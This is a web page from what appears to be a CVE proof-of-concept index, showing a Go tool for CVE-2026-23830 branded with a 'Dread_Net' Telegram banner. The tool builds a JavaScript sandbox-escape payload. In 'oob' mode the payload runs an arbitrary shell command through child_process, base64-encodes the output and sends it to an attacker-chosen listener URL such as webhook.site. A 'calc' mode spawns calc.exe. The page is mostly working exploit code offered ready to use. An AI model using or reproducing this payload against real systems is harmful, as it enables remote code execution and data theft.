4837 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-23830
README.md
Rendering markdown...
POC / CVE-2026-23830.go GO
⬇ Raw GitHub ✕ Close 
package main

import (
	"flag"
	"fmt"
	"strings"
)

var (
	ColorReset  = "\033[0m"
	ColorRed    = "\033[31m"
	ColorGreen  = "\033[32m"
	ColorYellow = "\033[33m"
	ColorBlue   = "\033[34m"
)

func printBanner() {
	fmt.Println(`
    ____                      __   _   __     __ 
   / __ \________  ____ _____/ /  / | / /__  / /_
  / / / / ___/ _ \/ __  / __  /  /  |/ / _ \/ __/
 / /_/ / /  /  __/ /_/ / /_/ /  / /|  /  __/ /_  
/_____/_/   \___/\__,_/\__,_/  /_/ |_/\___/\__/  `)

	fmt.Println("")
	fmt.Println("Telegram: t.me/Dread_Net")
	fmt.Println("")
	fmt.Println(ColorRed + `
   		CVE-2026-23830
   		Author: Meysam Bal-afkan
    		` + ColorReset)
}

func main() {
	cmdPtr := flag.String("cmd", "whoami", "Command to execute")
	modePtr := flag.String("mode", "oob", "Mode: 'oob', 'calc'")
	urlPtr := flag.String("url", "", "Listener URL (e.g., https://webhook.site/...)")
	rawPtr := flag.Bool("raw", false, "Raw output")
	
	flag.Parse()

	printBanner()

	safeCmd := strings.ReplaceAll(*cmdPtr, "'", "\\'")
	var jsPayload string

	switch *modePtr {
	
	case "oob":
		if *urlPtr == "" {
			fmt.Println("[-] Error: -url is required for OOB mode!")
			return
		}
		
		nodeModule := "http"
		if strings.HasPrefix(*urlPtr, "https://") {
			nodeModule = "https"
		}

		if !*rawPtr {
			fmt.Println("[*] Mode: OOB (Data Exfiltration)")
			fmt.Printf("[*] Detected Protocol: %s (Using require('%s'))\n", strings.ToUpper(nodeModule), nodeModule)
			fmt.Println("[*] Sending output to:", *urlPtr)
		}

		jsPayload = fmt.Sprintf(`(async()=>{const a=async()=>{};const C=a.constructor;const f=C("try{const p=process.mainModule.require('child_process');const h=process.mainModule.require('%s');const d=p.execSync('%s').toString('base64');h.get('%s?data='+d).on('error', (e) => {});}catch(e){}");f();})()`, nodeModule, safeCmd, *urlPtr)

	case "calc":
		jsPayload = `(async()=>{const a=async()=>{};const C=a.constructor;const f=C("const c=process.mainModule.require('child_process');c.spawn('calc.exe',[],{detached:true});");f();})()`
	}

	if !*rawPtr {
		fmt.Println("\n[+] Payload:")
		fmt.Println("================================================================")
	}
	fmt.Println(jsPayload)
	if !*rawPtr {
		fmt.Println("================================================================")
	}
}